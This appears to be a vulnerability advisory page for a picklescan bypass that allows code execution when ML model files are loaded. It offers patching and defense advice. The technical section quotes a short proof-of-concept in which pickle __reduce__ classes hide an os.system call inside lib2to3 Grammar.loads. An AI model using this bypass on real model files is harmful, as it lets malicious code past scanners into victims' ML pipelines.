GHSA-f54q-57x4-jg88: picklescan: scanner bypass enables RCE in ML models

GHSA-f54q-57x4-jg88 MEDIUM
Published August 26, 2025
CISO Take

If your ML pipeline uses picklescan to gate model loading, that control is broken — attackers can craft pickle payloads that pass scanning clean and execute arbitrary code on load. Update picklescan to 0.0.29 immediately and treat any model scanned with a prior version as untrusted. Implement defense-in-depth: picklescan alone was never sufficient as a trust boundary for model files.

Risk Assessment

HIGH for organizations that rely on picklescan as their primary or sole defense before loading pickle-based ML models. The vulnerability is trivially exploitable post-disclosure — the PoC is public and requires no special ML knowledge. The blast radius extends beyond individual deployments: any CI/CD pipeline, model registry, or data science workflow that loads community or third-party models with a picklescan pass-gate is compromised. The false sense of security introduced by a bypassed scanner is arguably more dangerous than having no scanner at all.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.29 0.0.29
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Recommended Action

6 steps
  1. PATCH

    Upgrade picklescan to >= 0.0.29 immediately across all environments — dev, CI/CD, staging, production.

  2. AUDIT

    Review model loading logs for recently ingested pickle files that were scanned with prior versions; treat them as potentially compromised.

  3. QUARANTINE

    Do not load previously scanned models from untrusted or community sources until rescanned with the patched version.

  4. DEFENSE-IN-DEPTH: Do not rely solely on picklescan; layer with: (a) loading models in isolated containers/sandboxes, (b) preferring safetensors format over pickle where possible, (c) pinning model hashes and verifying provenance.

  5. DETECT

    Monitor for anomalous subprocess spawning or network calls originating from Python model-loading processes — RCE payloads typically execute shell commands or initiate outbound connections.

  6. POLICY

    Enforce that models loaded from public registries (Hugging Face, etc.) must use safetensors format for production workloads.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.6.2.6 - Security of AI system A.8.1 - AI supply chain management
NIST AI RMF
GOVERN 1.7 - Processes and procedures for decommissioning AI MANAGE 2.2 - Mechanisms to sustain the value of deployed AI
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-f54q-57x4-jg88?

If your ML pipeline uses picklescan to gate model loading, that control is broken — attackers can craft pickle payloads that pass scanning clean and execute arbitrary code on load. Update picklescan to 0.0.29 immediately and treat any model scanned with a prior version as untrusted. Implement defense-in-depth: picklescan alone was never sufficient as a trust boundary for model files.

Is GHSA-f54q-57x4-jg88 actively exploited?

No confirmed active exploitation of GHSA-f54q-57x4-jg88 has been reported, but organizations should still patch proactively.

How to fix GHSA-f54q-57x4-jg88?

1. PATCH: Upgrade picklescan to >= 0.0.29 immediately across all environments — dev, CI/CD, staging, production. 2. AUDIT: Review model loading logs for recently ingested pickle files that were scanned with prior versions; treat them as potentially compromised. 3. QUARANTINE: Do not load previously scanned models from untrusted or community sources until rescanned with the patched version. 4. DEFENSE-IN-DEPTH: Do not rely solely on picklescan; layer with: (a) loading models in isolated containers/sandboxes, (b) preferring safetensors format over pickle where possible, (c) pinning model hashes and verifying provenance. 5. DETECT: Monitor for anomalous subprocess spawning or network calls originating from Python model-loading processes — RCE payloads typically execute shell commands or initiate outbound connections. 6. POLICY: Enforce that models loaded from public registries (Hugging Face, etc.) must use safetensors format for production workloads.

What systems are affected by GHSA-f54q-57x4-jg88?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML model registries, MLOps CI/CD pipelines, data science notebooks.

What is the CVSS score for GHSA-f54q-57x4-jg88?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Using lib2to3.pgen2.grammar.Grammar.loads, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to lib2to3.pgen2.grammar.Grammar.loads function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class Evil: def __reduce__(self): import os return (os.system, ('whoami',)) class EvilLib2to3Pgen2GrammarLoads: def __reduce__(self): from lib2to3.pgen2.grammar import Grammar payload = pickle.dumps(Evil()) # payload = b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.' return Grammar().loads, (payload,) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Corresponding https://github.com/FredericDT https://github.com/Qhaoduoyu

Exploitation Scenario

An adversary targets an organization that uses picklescan to vet PyTorch models before deploying them to a model-serving endpoint. The attacker crafts a malicious .pt file where the serialized object's __reduce__ method invokes Grammar.loads wrapping an inner pickle payload that calls os.system or subprocess. The outer picklescan check sees only a call to a standard lib2to3 stdlib function and raises no alert. The attacker publishes this file to Hugging Face under a popular model namespace (typosquatting or compromising an existing account). A data scientist on the victim's team pulls the model, runs the organization's standard picklescan validation, sees a clean result, and loads it into their training pipeline. At pickle.load() time, the inner payload executes — delivering a reverse shell or establishing persistence on the ML training host, which typically has broad access to training data, cloud credentials, and production model registries.

Timeline

Published
August 26, 2025
Last Modified
August 26, 2025
First Seen
March 24, 2026

Related Vulnerabilities